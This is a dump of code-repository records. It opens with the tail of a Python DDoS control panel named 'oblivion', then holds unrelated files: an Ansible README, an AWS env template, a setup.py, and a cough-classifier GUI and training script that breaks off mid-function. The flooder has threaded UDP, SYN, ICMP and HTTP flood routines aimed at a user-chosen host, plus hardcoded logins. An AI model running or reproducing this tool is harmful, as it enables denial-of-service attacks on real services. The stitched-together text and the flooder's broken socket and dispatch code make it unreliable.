\"\"\"\\033[34m\r\n╔══════════════════════════════════════════════════════╗\r\n║ \\033[35mBasic Commands\\033[34m ║\r\n║══════════════════════════════════════════════════════║\r\n║ \\033[35mmethods \\033[34m|\\033[35m Shows DDOS Methods For oblivion.\\033[35m ║\r\n║ \\033[34mextras \\033[35m|\\033[34m Shows Extra Commands For oblivion.\\033[34m ║\r\n║ \\033[35mupdates \\033[34m|\\033[35m Shows Update Notes For oblivion.\\033[35m ║\r\n║ \\033[34minfo \\033[35m|\\033[34m Shows oblivion Info.\\033[34m ║\r\n║ \\033[35mclear \\033[34m|\\033[35m Clears Screen.\\033[35m ║\r\n║ \\033[34mexit \\033[35m|\\033[34m Exits Out Of oblivion.\\033[34m ║\r\n╚══════════════════════════════════════════════════════╝\\033[35m\r\n\"\"\"\r\n\r\nupdatenotes = \"\"\"\\033[35m\r\n╔══════════════════════════════════════════════════════╗\r\n║ \\033[34mUpdate Notes\\033[35m ║\r\n║══════════════════════════════════════════════════════║\r\n║ \\033[35m[+] Timeout Bug Fixed.\\033[34m ║\r\n║ \\033[34m[+] Took Out Some Tools.\\033[35m ║\r\n║ \\033[35m[+] User And Pass Changed To oblivion.\\033[34m ║\r\n║ \\033[34m[+] i leaked this.\\033[35m ║\r\n║ \\033[35m[+] All Tools Fixed And Working.\\033[34m ║\r\n╚══════════════════════════════════════════════════════╝\\033[35m\r\n\"\"\"\r\n\r\nbanner = \"\"\"\r\n\t\t┌─┐┌┐ ┬ ┬┬ ┬┬┌─┐┌┐┌\r\n\t\t│ │├┴┐│ │└┐┌┘││ ││││\r\n\t\t└─┘└─┘┴─┘┴ └┘ ┴└─┘┘└┘\r\n \r\n\"\"\"\r\n\r\ncookie = open(\".oblivion_Cookie\",\"w+\")\r\n\r\nfsubs = 0\r\nliips = 0\r\ntattacks = 0\r\nuaid = 0\r\nsaid = 0\r\niaid = 0\r\nhaid = 0\r\naid = 0\r\nattack = True\r\nhttp = True\r\nudp = True\r\nsyn = True\r\nicmp = True\r\n\r\n\r\ndef synsender(host, port, timer, punch):\r\n\tglobal said\r\n\tglobal syn\r\n\tglobal aid\r\n\tglobal tattacks\r\n\ttimeout = time.time() + float(timer)\r\n\tsock = socket.socket (socket.AF_INET, socket.SOCK_RAW, socket.TCP_SYNCNT)\r\n\r\n\tsaid += 1\r\n\ttattacks += 1\r\n\taid += 1\r\n\twhile time.time() < timeout and syn and attack:\r\n\t\tsock.sendto(punch, (host, int(port)))\r\n\tsaid -= 1\r\n\taid -= 1\r\n\r\ndef udpsender(host, port, timer, punch):\r\n\tglobal uaid\r\n\tglobal udp\r\n\tglobal aid\r\n\tglobal tattacks\r\n\r\n\ttimeout = time.time() + float(timer)\r\n\tsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n\t\r\n\tuaid += 1\r\n\taid += 1\r\n\ttattacks += 1\r\n\twhile time.time() < timeout and udp and attack:\r\n\t\tsock.sendto(punch, (host, int(port)))\r\n\tuaid -= 1\r\n\taid -= 1\r\n\r\ndef icmpsender(host, port, timer, punch):\r\n\tglobal iaid\r\n\tglobal icmp\r\n\tglobal aid\r\n\tglobal tattacks\r\n\r\n\ttimeout = time.time() + float(timer)\r\n\tsock = socket.socket(socket.AF_INET, socket.IPPROTO_IGMP)\r\n\r\n\tiaid += 1\r\n\taid += 1\r\n\ttattacks += 1\r\n\twhile time.time() < timeout and icmp and attack:\r\n\t\tsock.sendto(punch, (host, int(port)))\r\n\tiaid -= 1\r\n\taid -= 1\r\n\r\ndef httpsender(host, port, timer, punch):\r\n\tglobal haid\r\n\tglobal http\r\n\tglobal aid\r\n\tglobal tattacks\r\n\r\n\ttimeout = time.time() + float(timer)\r\n\r\n\thaid += 1\r\n\taid += 1\r\n\ttattacks += 1\r\n\twhile time.time() < timeout and icmp and attack:\r\n\t\ttry:\r\n\t\t\tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\t\t\tsock.sendto(punch, (host, int(port)))\r\n\t\t\tsock.close()\r\n\t\texcept socket.error:\r\n\t\t\tpass\r\n\r\n\thaid -= 1\r\n\taid -= 1\r\n\r\n\r\ndef main():\r\n\tglobal fsubs\r\n\tglobal liips\r\n\tglobal tattacks\r\n\tglobal uaid\r\n\tglobal said\r\n\tglobal iaid\r\n\tglobal haid\r\n\tglobal aid\r\n\tglobal attack\r\n\tglobal dp\r\n\tglobal syn\r\n\tglobal icmp\r\n\tglobal http\r\n\r\n\twhile True:\r\n\t\tsys.stdout.write(\"\\x1b]2;oblivion user|owner| plan |9999| servers |32| bots |441||\\x07\")\r\n\t\tsin = input(\"\\033[1;35m[\\033[34moblivion\\033[1;00m]-\\033[34m\\033[00m \").lower()\r\n\t\tsinput = sin.split(\" \")[0]\r\n\t\tif sinput == \"clear\":\r\n\t\t\tos.system (\"clear\")\r\n\t\t\tprint (banner)\r\n\t\t\tmain()\r\n\t\telif sinput == \"help\":\r\n\t\t\tprint (help)\r\n\t\t\tmain()\r\n\t\telif sinput == \"extras\":\r\n\t\t\tprint (extras)\r\n\t\t\tmain()\r\n\t\telif sinput == \"exit\":\r\n\t\t\tprint (\"[\\033[34moblivion\\033[35m] You Are Exiting Out Of oblivion.\\n\")\r\n\t\t\texit()\r\n\t\telif sinput == \"methods\":\r\n\t\t\tprint (methods)\r\n\t\t\tmain()\r\n\t\telif sinput == \"updates\":\r\n\t\t\tprint (updatenotes)\r\n\t\t\tmain()\r\n\t\telif sinput == \"info\":\r\n\t\t\tprint (info)\r\n\t\t\tmain()\r\n\t\telif sinput == \"attacks\":\r\n\t\t\tprint (\"[\\033[34moblivion\\033[35m] Total Attacks Running: {}\\n\".format (aid))\r\n\t\t\tmain()\r\n\t\telif sinput == \"resolve\":\r\n\t\t\tliips += 1\r\n\t\t\thost = sin.split(\" \")[1]\r\n\t\t\thost_ip = socket.gethostbyname(host)\r\n\t\t\tprint (\"[\\033[34moblivion\\033[35m] Host: {} \\033[34m[\\033[35mswapped\\033[34m] {}\\n\".format (host, host_ip))\r\n\t\t\tmain()\r\n\t\telif sinput == \"udp\":\r\n\t\t\tif username == \"Guest\":\r\n\t\t\t\tprint (\"[\\033[34moblivion\\033[35m] You Are Not Allowed To Use This Method.\\n\")\r\n\t\t\t\tmain()\r\n\t\t\telse:\r\n\t\t\t\ttry:\r\n\t\t\t\t\tsinput, host, port, timer, pack = sin.split(\" \")\r\n\t\t\t\t\tsocket.gethostbyname(host)\r\n\t\t\t\t\tprint (\"[\\033[35moblivion\\033[34m] Attack Sent To: {}\\n\".format (host))\r\n\t\t\t\t\tpunch = random._urandom(int(pack))\r\n\t\t\t\t\tthreading.Thread(target=udpsender, args=(host, port, timer, punch)).start()\r\n\t\t\t\texcept ValueError:\r\n\t\t\t\t\tprint (\"[\\033[35moblivion\\033[34m] The Command {} Requires An Argument.\\n\".format (sinput))\r\n\t\t\t\t\tmain()\r\n\t\t\t\texcept socket.gaierror:\r\n\t\t\t\t\tprint (\"[\\033[35moblivion\\033[34m] Host: {} Invalid.\\n\".format (host))\r\n\t\t\t\t\tmain()\r\n\t\telif sinput == \"http\":\r\n\t\t\ttry:\r\n\t\t\t\tsinput, host, port, timer, pack = sin.split(\" \")\r\n\t\t\t\tsocket.gethostbyname(host)\r\n\t\t\t\tprint (\"[\\033[34moblivion\\033[m] Attack Sent To: {}\\n\".format (host))\r\n\t\t\t\tpunch = random._urandom(int(pack))\r\n\t\t\t\tthreading.Thread(target=httpsender, args=(host, port, timer, punch)).start()\r\n\t\t\texcept ValueError:\r\n\t\t\t\tprint (\"[\\033[35moblivion\\033[34m] The Command {} Requires An Argument.\\n\".format (sinput))\r\n\t\t\t\tmain()\r\n\t\t\texcept socket.gaierror:\r\n\t\t\t\tprint (\"[\\033[34moblivion\\033[35m] Host: {} Invalid.\\n\".format (host))\r\n\t\t\t\tmain()\r\n\t\telif sinput == \"icmp\":\r\n\t\t\tif username == \"Guest\":\r\n\t\t\t\tprint (\"[\\033[34moblivion\\033[35m] You Are Not Allowed To Use This Method.\\n\")\r\n\t\t\t\tmain()\r\n\t\t\telse:\r\n\t\t\t\ttry:\r\n\t\t\t\t\tsinput, host, port, timer, pack = sin.split(\" \")\r\n\t\t\t\t\tsocket.gethostbyname(host)\r\n\t\t\t\t\tprint (\"[\\033[35moblivion\\033[34m] Attack Sent To: {}\\n\".format (host))\r\n\t\t\t\t\tpunch = random._urandom(int(pack))\r\n\t\t\t\t\tthreading.Thread(target=icmpsender, args=(host, port, timer, punch)).start()\r\n\t\t\t\texcept ValueError:\r\n\t\t\t\t\tprint (\"[\\033[34moblivion\\033[35m] The Command {} Requires An Argument.\\n\".format (sinput))\r\n\t\t\t\t\tmain()\r\n\t\t\t\texcept socket.gaierror:\r\n\t\t\t\t\tprint (\"[\\033[34moblivion\\033[35m] Host: {} Invalid.\\n\".format (host))\r\n\t\t\t\t\tmain()\r\n\t\telif sinput == \"syn\":\r\n\t\t\ttry:\r\n\t\t\t\tsinput, host, port, timer, pack = sin.split(\" \")\r\n\t\t\t\tsocket.gethostbyname(host)\r\n\t\t\t\tprint (\"[\\033[34moblivion\\033[35m] Attack Sent To: {}\\n\".format (host))\r\n\t\t\t\tpunch = random._urandom(int(pack))\r\n\t\t\t\tthreading.Thread(target=icmpsender, args=(host, port, timer, punch)).start()\r\n\t\t\texcept ValueError:\r\n\t\t\t\tprint (\"[\\033[34moblivion\\033[35m] The Command {} Requires An Argument.\\n\".format (sinput))\r\n\t\t\t\tmain()\r\n\t\t\texcept socket.gaierror:\r\n\t\t\t\tprint (\"[\\033[35moblivion\\033[34m] Host: {} Invalid.\\n\".format (host))\r\n\t\t\t\tmain()\r\n\t\telif sinput == \"stop\":\r\n\t\t\tprint (\"[\\033[35moblivion\\033[34m] All Running Attacks Have Been Stopped.\\n\")\r\n\t\t\tattack = False\r\n\t\t\twhile not attack:\r\n\t\t\t\tif aid == 0:\r\n\t\t\t\t\tattack = True\r\n\t\telif sinput == \"stop\":\r\n\t\t\twhat = sin.split(\" \")[1]\r\n\t\t\tif what == \"udp\":\r\n\t\t\t\tprint (\"Stopping All UDP Attacks.\\n\")\r\n\t\t\t\tudp = False\r\n\t\t\t\twhile not udp:\r\n\t\t\t\t\tif aid == 0:\r\n\t\t\t\t\t\tprint (\"[\\033[34moblivion\\033[35m] No UDP Processes Running.\")\r\n\t\t\t\t\t\tudp = True\r\n\t\t\t\t\t\tmain()\r\n\t\t\tif what == \"icmp\":\r\n\t\t\t\tprint (\"Stopping All ICMP Attacks.\\n\")\r\n\t\t\t\ticmp = False\r\n\t\t\t\twhile not icmp:\r\n\t\t\t\t\tprint (\"[\\033[34moblivion\\033[35m] No ICMP Processes Running.\")\r\n\t\t\t\t\tudp = True\r\n\t\t\t\t\tmain()\r\n\t\telse:\r\n\t\t\tprint (\"[\\033[35moblivion\\033[34m] {} Is Not A Command.\\n\".format(sinput))\r\n\t\t\tmain()\r\n\r\n\r\n\r\ntry:\r\n\tusers = [\"oblivion\", \"Guest\"]\r\n\tclear = \"clear\"\r\n\tos.system (clear)\r\n\tusername = getpass.getpass (\"[+] Username: \")\r\n\tif username in users:\r\n\t\tuser = username\r\n\telse:\r\n\t\tprint (\"[+] Incorrect, Exiting.\\n\")\r\n\t\texit()\r\nexcept KeyboardInterrupt:\r\n\texit()\r\ntry:\r\n\tpasswords = [\"oblivion\", \"Guest\"]\r\n\tpassword = getpass.getpass (\"[+] Password: \")\r\n\tif user == \"oblivion\":\r\n\t\tif password == passwords[0]:\r\n\t\t\tprint (\"[+] Login Correct.\")\r\n\t\t\tprint (\"[+] Type Help To See Commands.\")\r\n\t\t\tcookie.write(\"DIE\")\r\n\t\t\ttime.sleep(3)\r\n\t\t\tos.system (clear)\r\n\t\t\ttry:\r\n\t\t\t\tos.system (\"clear\")\r\n\t\t\t\tprint (banner)\r\n\t\t\t\tmain()\r\n\t\t\texcept KeyboardInterrupt:\r\n\t\t\t\tprint (\"\\n[\\033[35moblivion\\033[34m] Ctrl-C Has Been Pressed.\\n\")\r\n\t\t\t\tmain()\r\n\t\telse:\r\n\t\t\tprint (\"[+] Incorrect, Exiting.\\n\")\r\n\t\t\texit()\r\n\tif user == \"Guest\":\r\n\t\tif password == passwords[1]:\r\n\t\t\tprint (\"[+] Login Correct.\")\r\n\t\t\tprint (\"[+] Certain Methods Will Not Be Available To You.\")\r\n\t\t\tprint (\"[+] Type Help To See Commands.\")\r\n\t\t\ttime.sleep(5)\r\n\t\t\tos.system (clear)\r\n\t\t\ttry:\r\n\t\t\t\tos.system (\"clear\")\r\n\t\t\t\tprint (banner)\r\n\t\t\t\tmain()\r\n\t\t\texcept KeyboardInterrupt:\r\n\t\t\t\tprint (\"\\n[\\033[35moblivion\\033[34m] Ctrl-C Has Been Pressed.\\n\")\r\n\t\t\t\tmain()\r\n\t\telse:\r\n\t\t\tprint (\"[+] Incorrect, Exiting.\\n\")\r\n\t\t\texit()\r\nexcept KeyboardInterrupt:\r\n\texit()\r\n" } ]
1
supernova106/ansible-puppetmaster
https://github.com/supernova106/ansible-puppetmaster
42af79e5eab897d171e6ddd52a963099af95ed36
b2eaeb5da29dd741e60785254fd1f6d94bdd23e9
8cac93b292892e1260da43cf2967d4f4d837da75
refs/heads/master
2020-06-12T10:50:30.452912
2016-12-05T10:13:46
2016-12-05T10:13:46
75,586,180
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7194244861602783, "alphanum_fraction": 0.7266187071800232, "avg_line_length": 16.375, "blob_id": "658e79d6df55b4c22b34302463b6e722ba995309", "content_id": "182dffa9c7364b04f07b7f740b5c11292ed682a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 139, "license_type": "no_license", "max_line_length": 51, "num_lines": 8, "path": "/README.md", "repo_name": "supernova106/ansible-puppetmaster", "src_encoding": "UTF-8", "text": "##Description\n- bootstrap EC2 instance and do some stuffs\n\n##Debug\n- `vim /etc/ansible/hosts` to update current server\n\n##Contact\n- Binh Nguyen\n" }, { "alpha_fraction": 0.6847826242446899, "alphanum_fraction": 0.70652174949646, "avg_line_length": 22, "blob_id": "56de8989911c6662868d5d0e9d132cf6f13aa5db", "content_id": "56b75783a1877696f1fbc0fec9c8e04cbc07603e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 92, "license_type": "no_license", "max_line_length": 29, "num_lines": 4, "path": "/env.sample", "repo_name": "supernova106/ansible-puppetmaster", "src_encoding": "UTF-8", "text": "#!/bin/bash\nexport AWS_ACCESS_KEY=''\nexport AWS_SECRET_KEY=''\nexport EC2_REGION='us-east-1'\n" }, { "alpha_fraction": 0.5724999904632568, "alphanum_fraction": 0.5774999856948853, "avg_line_length": 20.052631378173828, "blob_id": "6850d8237d41eb38c13e087702de0290bf369890", "content_id": "33acf5c3b16010fb29e56ab34e9bbbf091ad8e19", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 400, "license_type": "no_license", "max_line_length": 62, "num_lines": 19, "path": "/setup.py", "repo_name": "supernova106/ansible-puppetmaster", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\ntry:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\nsetup(name='Distutils',\n version='1.0',\n description='Python Distribution Utilities for ansible',\n author='Binh Nguyen',\n author_email='',\n url='',\n install_requires=[\n \t'boto',\n \t'pymongo',\n \t'pyyaml',\n \t'fluent-logger'\n ],\n )\n" } ]
3
ShaunMillsDev/Cough_Classifier
https://github.com/ShaunMillsDev/Cough_Classifier
545d582658ac5de41176780ccf763ebc7da1523a
b6f6e2d4658aed8b44a1d8110b61e9d38919c5c0
31322baa08ff59885e367a704bad92c0265b1d6b
refs/heads/main
2023-06-09T05:36:07.503955
2021-04-30T19:38:06
2021-04-30T19:38:06
362,807,902
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5960023999214172, "alphanum_fraction": 0.614879846572876, "avg_line_length": 47.798030853271484, "blob_id": "81d780578b89b59efedd06e363b7d1ae64d8bad6", "content_id": "16bb671dbbfdae4f198df82b4617acf9691c05fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9906, "license_type": "no_license", "max_line_length": 120, "num_lines": 203, "path": "/gui.py", "repo_name": "ShaunMillsDev/Cough_Classifier", "src_encoding": "UTF-8", "text": "from tkinter import *\nfrom tkinter import filedialog as fd\nfrom PIL import Image, ImageTk\n\n# Imports to allow to call any functions from main python file, with GUI params.\nimport main\n\n\n# Main class\nclass Application:\n def __init__(self, master):\n # Write GUI only functions here:\n\n # Initialize title bar variables\n lastClickX = 0\n lastClickY = 0\n\n # Saves last click position for custom title bar.\n def SaveLastClickPos(event):\n global lastClickX, lastClickY\n lastClickX = event.x\n lastClickY = event.y\n\n # Allows dragging the title bar window.\n def Dragging(event):\n x, y = event.x - lastClickX + root.winfo_x(), event.y - lastClickY + root.winfo_y()\n root.geometry(\"+%s+%s\" % (x, y))\n\n # Example internal function\n def gui_only_function():\n pass\n\n # Custom title bar\n title_bar = Frame(master, bg='#2e2e2e', relief='raised', bd=2, highlightthickness=0)\n # Close button for title bar\n close_application = Button(title_bar, text='X', command=master.destroy, bg=\"#2e2e2e\", padx=2, pady=2,\n activebackground='red', bd=0, font=\"bold\", fg='white', highlightthickness=0)\n\n # Favicon Icon - Initializes the asset.\n favicon = Image.open(\"assets/logo.jpg\")\n favicon = favicon.resize((25, 25))\n\n # Converts the favicon asset to a Tkinter PhotoImage\n favicon_icon = ImageTk.PhotoImage(favicon)\n favicon_label = Label(title_bar, image=favicon_icon, borderwidth=0, highlightthickness=0)\n favicon_label.photo = favicon_icon\n favicon_label.pack(side=LEFT)\n\n # Title text for the label\n title_bar_text_label = Label(title_bar, text=\"Cough Classifier\", bg=\"#2e2e2e\", fg=\"#fff\", font=(\"Hind\", 10),\n padx=3)\n title_bar_text_label.pack(side=LEFT)\n\n title_bar.pack(expand=1, fill=X)\n close_application.pack(side=RIGHT)\n\n # Binds button 1 to two functions for clicking and dragging custom title bar.\n title_bar.bind('<Button-1>', SaveLastClickPos)\n title_bar.bind('<B1-Motion>', Dragging)\n\n # Creates master Canvas (not a frame)\n window = Canvas(master, width=\"800\", height=\"600\", bg='#2e2e2e', highlightthickness=0)\n window.pack(fill=BOTH)\n\n # Header frame\n header_frame = Frame(window, bg=\"#2e2e2e\")\n window.create_window((0, 0), window=header_frame, anchor=\"nw\", height=220, width=800)\n\n header_image = Image.open(\"assets/header.jpg\")\n header_image = header_image.resize((180, 220))\n header_image_tk = ImageTk.PhotoImage(header_image)\n header_image_label = Label(header_frame, image=header_image_tk, borderwidth=0, highlightthickness=0)\n header_image_label.photo = header_image_tk\n header_image_label.pack(anchor='center')\n\n # Options Left frame\n options_left_frame = Frame(window, bg=\"#2e2e2e\", relief='groove', bd=1, highlightthickness=0)\n window.create_window((0, 225), window=options_left_frame, anchor=\"nw\", height=249, width=400)\n\n upload_image = Image.open(\"assets/upload_test_data.jpg\")\n upload_image = upload_image.resize((225, 40))\n upload_image_tk = ImageTk.PhotoImage(upload_image)\n upload_image_label = Label(options_left_frame, image=upload_image_tk, borderwidth=0, highlightthickness=0)\n upload_image_label.photo = upload_image_tk\n upload_image_label.pack(anchor='center', pady=5)\n\n # Upload Test Cough Data\n def test_upload_cough_sound():\n location = \"Sound_Folders/Test_Sounds/Cough_Test_Sounds/\"\n filetypes = [(\"Cough Sounds\", \".wav\")]\n test_upload_cough_sound_assets = fd.askopenfilenames(parent=options_left_frame,\n title=\"Open Files\", filetypes=filetypes)\n\n main.copy_uploaded_files_to_cough_test(test_upload_cough_sound_assets, location)\n\n # Upload Test Ambient Data\n def test_upload_ambient_sound():\n location = \"Sound_Folders/Test_Sounds/Non_Cough_Test_Sounds/\"\n filetypes = [(\"Ambient Sounds\", \".wav\")]\n test_upload_ambient_sound_assets = fd.askopenfilenames(parent=options_left_frame,\n title=\"Open Files\", filetypes=filetypes)\n main.copy_uploaded_files_to_cough_test(test_upload_ambient_sound_assets, location)\n\n # Upload Classifier Cough Data\n def classifier_upload_cough_sound():\n location = \"Sound_Folders/Cough_Recordings/\"\n filetypes = [(\"Cough Sounds\", \".wav\")]\n classifier_upload_cough_sound_assets = fd.askopenfilenames(parent=options_left_frame,\n title=\"Open Files\", filetypes=filetypes)\n main.copy_uploaded_files_to_cough_test(classifier_upload_cough_sound_assets, location)\n\n # Upload Classifier Ambient Data\n def classifier_upload_ambient_sound():\n location = \"Sound_Folders/Training_Sounds/\"\n filetypes = [(\"Ambient Sounds\", \".wav\")]\n classifier_upload_ambient_sound_assets = fd.askopenfilenames(parent=options_left_frame,\n title=\"Open Files\", filetypes=filetypes)\n main.copy_uploaded_files_to_cough_test(classifier_upload_ambient_sound_assets, location)\n\n # Right/Left frame images\n\n image_cough = Image.open(\"assets/cough_button.jpg\")\n image_cough = image_cough.resize((155, 45), Image.ANTIALIAS)\n self.reset_img_cough = ImageTk.PhotoImage(image_cough)\n\n image_ambient = Image.open(\"assets/ambient_button.jpg\")\n image_ambient = image_ambient.resize((155, 45), Image.ANTIALIAS)\n self.reset_image_ambient = ImageTk.PhotoImage(image_ambient)\n\n # Buttons to upload test sound data\n test_upload_cough_sound_button = Button(options_left_frame, text=\"Upload Coughs\", image=self.reset_img_cough,\n command=test_upload_cough_sound, bg='#05345C')\n test_upload_cough_sound_button.pack(anchor='center', pady=20)\n\n test_upload_ambient_sound_button = Button(options_left_frame, text=\"Upload Ambient\",\n image=self.reset_image_ambient, command=test_upload_ambient_sound,\n bg='#05345C')\n test_upload_ambient_sound_button.pack(anchor='center', pady=20)\n\n # Options Right frame\n options_right_frame = Frame(window, bg=\"#2e2e2e\", relief='groove', bd=1, highlightthickness=0)\n window.create_window((400, 225), window=options_right_frame, anchor=\"nw\", height=249, width=401)\n\n options_image = Image.open(\"assets/upload_classifier_data.jpg\")\n options_image = options_image.resize((225, 40))\n options_image_tk = ImageTk.PhotoImage(options_image)\n options_image_label = Label(options_right_frame, image=options_image_tk, borderwidth=0, highlightthickness=0)\n options_image_label.photo = options_image_tk\n options_image_label.pack(anchor='center', pady=5)\n\n # Buttons to upload Classifier sound data\n classifier_upload_cough_sound_button = Button(options_right_frame, text=\"Upload Coughs\",\n image=self.reset_img_cough, command=classifier_upload_cough_sound,\n bg='#05345C')\n classifier_upload_cough_sound_button.pack(anchor='center', pady=20)\n\n classifier_upload_ambient_sound_button = Button(options_right_frame, text=\"Upload Ambient\",\n image=self.reset_image_ambient,\n command=classifier_upload_ambient_sound, bg='#05345C')\n classifier_upload_ambient_sound_button.pack(anchor='center', pady=20)\n\n # Footer frame\n footer_frame = Frame(window, bg=\"#2e2e2e\", relief='groove', bd=1, highlightthickness=0)\n window.create_window((0, 470), window=footer_frame, anchor=\"nw\", height=100, width=801) #\n\n # Button footer images\n image_execute = Image.open(\"assets/execute_test.jpg\")\n image_execute = image_execute.resize((180, 52), Image.ANTIALIAS)\n self.reset_image_execute = ImageTk.PhotoImage(image_execute)\n\n image_train = Image.open(\"assets/train_model.jpg\")\n image_train = image_train.resize((180, 52), Image.ANTIALIAS)\n self.reset_image_train = ImageTk.PhotoImage(image_train)\n\n image_record = Image.open(\"assets/record_audio.jpg\")\n image_record = image_record.resize((180, 52), Image.ANTIALIAS)\n self.reset_image_record = ImageTk.PhotoImage(image_record)\n\n # Buttons for Footer\n\n run_test = Button(footer_frame, text=\"Execute Test\", relief=\"flat\",\n image=self.reset_image_execute, command=main.test_function)\n run_test.pack(side=LEFT, padx=40)\n\n record_audio = Button(footer_frame, text=\"Record Audio\", image=self.reset_image_record, relief=\"flat\",\n command=main.record_audio)\n record_audio.pack(side=LEFT, padx=40)\n\n train_data = Button(footer_frame, text=\"Train the Classifier\", image=self.reset_image_train, relief=\"flat\",\n command=main.test_function)\n train_data.pack(side=LEFT, padx=40)\n\n\n# Initialize GUI\nroot = Tk()\napp = Application(root)\nroot.title('Cough Classifier')\n# Sets windows size\nroot.geometry(\"800x600\")\n# Overrides tkinter styling (for title bar)\nroot.overrideredirect(True)\nroot.attributes('-topmost', True)\nroot.mainloop()\n" }, { "alpha_fraction": 0.6102316975593567, "alphanum_fraction": 0.6186183094978333, "avg_line_length": 29.091482162475586, "blob_id": "68d9ce2e506b9a86314f754d99549daf90bbb9ce", "content_id": "b9b12df48675ea659d9e45fe29e62e3daa6bf126", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9539, "license_type": "no_license", "max_line_length": 105, "num_lines": 317, "path": "/main.py", "repo_name": "ShaunMillsDev/Cough_Classifier", "src_encoding": "UTF-8", "text": "import os\nimport csv\nimport shutil\nimport librosa\nimport librosa.display\nimport numpy as np\nimport pyaudio\nimport wave\nimport time\nimport requests\nimport soundfile as sf\nimport tkinter as tk\nfrom tkinter.messagebox import showinfo\nfrom tkinter import *\n\n# import matplotlib.pyplot as plt\n# import IPython.display as ipd\n\nimport random\nimport pandas as pd\nfrom pip._internal.cli.cmdoptions import src\n\nfrom sklearn import metrics\nfrom sklearn import preprocessing\nfrom sklearn.svm import SVC\n\n# from sklearn import neighbors, datasets\n# from sklearn.preprocessing import StandardScaler\n# from sklearn.linear_model import LinearRegression\n# from sklearn.metrics import accuracy_score\n# from sklearn.metrics import mean_squared_error, r2_score\n\ntrain_list = []\ntest_list = []\n\n\n# create initial files\ndef createCSV(header, mfcc_count, label, file_location):\n header = header\n for i in range(1, mfcc_count + 1):\n header += f' mfcc{i}'\n if label:\n header += ' label'\n header = header.split()\n\n file = open(file_location, 'w', newline='')\n with file:\n writer = csv.writer(file)\n writer.writerow(header)\n\n\n# iterate through directory, extract mfccs and labels, save to dataset_location\ndef createInitialSet(directory, trim, threshold, dataset_location, is_cough, include_filename):\n i = 0\n if len(os.listdir(directory)) == 0:\n print(directory, ' is empty')\n else:\n for file in os.listdir(directory):\n audio_path = directory + '/' + file\n\n if include_filename:\n to_append = file\n else:\n to_append = ''\n\n # load file\n x, sr = librosa.load(audio_path)\n\n if trim:\n x_trim, index = librosa.effects.trim(x, threshold)\n\n # Generate MFCCs\n if trim:\n m = librosa.feature.mfcc(x_trim, n_mfcc=13, sr=sr)\n dm = librosa.feature.delta(m)\n mfccs = librosa.feature.delta(m, order=2)\n else:\n m = librosa.feature.mfcc(x, n_mfcc=13, sr=sr)\n dm = librosa.feature.delta(m)\n mfccs = librosa.feature.delta(m, order=2)\n\n # create row with label\n for e in m:\n to_append += f' {np.mean(e)}'\n for e in dm:\n to_append += f' {np.mean(e)}'\n for e in mfccs:\n to_append += f' {np.mean(e)}'\n\n if is_cough == 1:\n to_append += ' 1'\n elif is_cough == 2:\n to_append += ' 0'\n\n # write to csv dataset file\n dataset = open(dataset_location, 'a', newline='')\n with dataset:\n writer = csv.writer(dataset)\n writer.writerow(to_append.split())\n i += 1\n print('Features successfully extracted from: ', audio_path)\n\n\n# store a set (the_list) into a csv file (filename)\ndef storeSet(filename, the_list, num_samples, mfcc_count):\n print('\\n\\n', filename, ': ', len(the_list), ' recordings -->\\n')\n\n to_append = ''\n\n for x in range(num_samples):\n for y in range(1, mfcc_count + 2):\n to_append += f' {the_list[x].iloc[y]}'\n\n print(the_list[x].iloc[0])\n\n set = open(filename, 'a', newline='')\n with set:\n writer = csv.writer(set)\n writer.writerow(to_append.split())\n\n to_append = ''\n\n\n# train on the training and test set, output accuracy\ndef train(mfcc_count, training_name, testing_name, label_known):\n results = []\n svc = SVC(kernel='linear')\n\n # load the training and test sets\n datasets_train = pd.read_csv(training_name)\n datasets_test = pd.read_csv(testing_name)\n\n train_mfccs = datasets_train.iloc[:, 0:mfcc_count]\n train_labels = datasets_train.iloc[:, -1]\n\n test_mfccs = datasets_test.iloc[:, 0:mfcc_count]\n if label_known:\n test_labels = datasets_test.iloc[:, -1]\n\n # preprocessing by scaling\n scaler = preprocessing.StandardScaler().fit(train_mfccs)\n train_mfccs_scaled = scaler.transform(train_mfccs)\n test_mfccs_scaled = scaler.transform(test_mfccs)\n\n # from sklearn.feature_selection import RFE\n # rfe = RFE(estimator=svc, n_features_to_select=1, step=1)\n\n # Fit the model\n svc.fit(train_mfccs_scaled, train_labels)\n\n # Predict\n prediction = svc.predict(test_mfccs_scaled)\n\n print('\\n', svc.n_support_)\n\n if label_known:\n print('\\nPrediction vs Actual Label')\n print('--------------------------')\n\n for i in range(len(test_labels)):\n result = 'Prediction: ' + str(prediction[i]) + ' : Actual label: ' + str(test_labels.iloc[i])\n results.append(result)\n\n # Model Accuracy: how often is the classifier correct?\n result = \"Accuracy: \" + str(metrics.accuracy_score(test_labels, prediction) * 100) + '%'\n results.append(result)\n else:\n if int(prediction[0]) == 0:\n results.append('Prediction: NOT Cough')\n elif int(prediction[0]) == 1:\n results.append('Prediction: Cough')\n\n return results\n\n\n# combine cough_test_sounds and non_cough_test_sounds into one testing_set.csv file\ndef combine_test_data(label_known):\n if not label_known:\n createInitialSet('Sound_Folders/Test_Sounds/Test_Sound',\n True, 30, 'Datasets/testing_set.csv', 3, False)\n else:\n createInitialSet('Sound_Folders/Test_Sounds/Cough_Test_Sounds',\n True, 30, 'Datasets/testing_set.csv', 1, False)\n createInitialSet('Sound_Folders/Test_Sounds/Non_Cough_Test_Sounds',\n False, 0, 'Datasets/testing_set.csv', 2, False)\n\n\n# test model on new test data from Test_Sounds folders\ndef test_new_data(file_path, label_known, mfcc_count):\n # test new data when model is already trained\n if label_known:\n createCSV('', mfcc_count, True, 'Datasets/testing_set.csv')\n else:\n createCSV('', mfcc_count, False, 'Datasets/testing_set.csv')\n\n combine_test_data(label_known)\n results = train(mfcc_count, 'Datasets/training_set.csv', 'Datasets/testing_set.csv', label_known)\n\n if not label_known:\n if 